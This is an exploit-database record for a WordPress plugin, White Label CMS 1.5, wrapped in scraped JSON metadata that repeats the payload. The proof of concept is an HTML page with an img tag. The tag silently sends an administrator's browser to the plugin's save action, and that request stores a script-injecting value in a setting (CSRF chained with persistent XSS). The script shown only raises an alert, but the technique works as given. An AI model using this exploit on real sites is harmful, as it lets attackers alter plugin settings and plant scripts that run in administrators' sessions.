ID 1337DAY-ID-19607
Type zdt
Reporter pcsjj
Modified 2012-10-21T00:00:00
Description
CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)
# Exploit Title: White Label CMS v 1.5 CSRF w/ persistent XSS
# Date: 21/10/2012
# Exploit Author: pcsjj
# Vendor Homepage: http://www.videousermanuals.com/white-label-cms/
# Version: 1.5
# Software Link: http://plugins.svn.wordpress.org/white-label-cms/branches/
# Downloads: 110,313
# CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)
<html>
<title>White Label CMS CSRF</title>
<body>
<img src='http://[TARGET]/wordpress/wp-admin/admin.php?page=wlcms-plugin.php&action=save&wlcms_o_developer_name="><script>alert("fun")</script><div
"'>
</body>
</html>
# 0day.today [2018-03-13] #
{"id": "1337DAY-ID-19607", "bulletinFamily": "exploit", "title": "White Label CMS v 1.5 CSRF / Persistent XSS", "description": "CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)", "published": "2012-10-21T00:00:00", "modified": "2012-10-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/19607", "reporter": "pcsjj", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-03-13T03:09:28", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T01:11:23", "value": 6.8}}, "hash": "0be51db4596cd7beed0e7c4d966edee0b603f136e586de3166a47875d36eebab", "hashmap": [{"hash": "e999e7cd13d5ee94d4e9501e4b119371", "key": "href"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "04c50c16c79a4eccb09a660434bc06c5", "key": "description"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "7f18ce50576690ef04eac83811db1fa1", "key": "published"}, {"hash": "4bbe4aeb90706e02523ce966f3290cc1", "key": "sourceData"}, {"hash": "7f18ce50576690ef04eac83811db1fa1", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "7e1ca0bc0c4b8bd6b3376b4f947c6ad4", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "e22e22eeda8c92dbb601b565849a15d6", "key": "sourceHref"}, {"hash": "b08a49918eabfc173cd2ed4d04758e8d", "key": "reporter"}], "history": [], "href": "http://0day.today/exploit/description/19607", "id": "1337DAY-ID-19607", "lastseen": "2016-04-20T01:11:23", "modified": "2012-10-21T00:00:00", "objectVersion": "1.0", "published": "2012-10-21T00:00:00", "references": [], "reporter": "pcsjj", "sourceData": "# Exploit Title: White Label CMS v 1.5 CSRF w/ persistent XSS\r\n# Date: 21/10/2012\r\n# Exploit Author: pcsjj\r\n# Vendor Homepage: http://www.videousermanuals.com/white-label-cms/\r\n# Version: 1.5\r\n# Software Link: http://plugins.svn.wordpress.org/white-label-cms/branches/\r\n# Downloads: 110,313\r\n# CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)\r\n \r\n<html>\r\n<title>White Label CMS CSRF</title>\r\n<body>\r\n<img src='http://[TARGET]/wordpress/wp-admin/admin.php?page=wlcms-plugin.php&action=save&wlcms_o_developer_name=\"><script>alert(\"fun\")</script><div\r\n\"'>\r\n</body>\r\n</html>\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/19607", "title": "White Label CMS v 1.5 CSRF / Persistent XSS", "type": "zdt", "viewCount": 0}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:11:23"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "04c50c16c79a4eccb09a660434bc06c5"}, {"key": "href", "hash": "ba5709ccfc507a60092ede5238558d14"}, {"key": "modified", "hash": "7f18ce50576690ef04eac83811db1fa1"}, {"key": "published", "hash": "7f18ce50576690ef04eac83811db1fa1"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "b08a49918eabfc173cd2ed4d04758e8d"}, {"key": "sourceData", "hash": "e3b50dd84cfae809dc6c1f803b03d29b"}, {"key": "sourceHref", "hash": "1f895eaad22486853db36017f86e4d48"}, {"key": "title", "hash": "7e1ca0bc0c4b8bd6b3376b4f947c6ad4"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "82f360934621297af90af585d7ec7e0b79cd59261081eac0a281552af1c3723d", "viewCount": 0, "enchantments": {"vulnersScore": 3.3}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/19607", "sourceData": "# Exploit Title: White Label CMS v 1.5 CSRF w/ persistent XSS\r\n# Date: 21/10/2012\r\n# Exploit Author: pcsjj\r\n# Vendor Homepage: http://www.videousermanuals.com/white-label-cms/\r\n# Version: 1.5\r\n# Software Link: http://plugins.svn.wordpress.org/white-label-cms/branches/\r\n# Downloads: 110,313\r\n# CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)\r\n \r\n<html>\r\n<title>White Label CMS CSRF</title>\r\n<body>\r\n<img src='http://[TARGET]/wordpress/wp-admin/admin.php?page=wlcms-plugin.php&action=save&wlcms_o_developer_name=\"><script>alert(\"fun\")</script><div\r\n\"'>\r\n</body>\r\n</html>\n\n# 0day.today [2018-03-13] #"}
{"result": {}}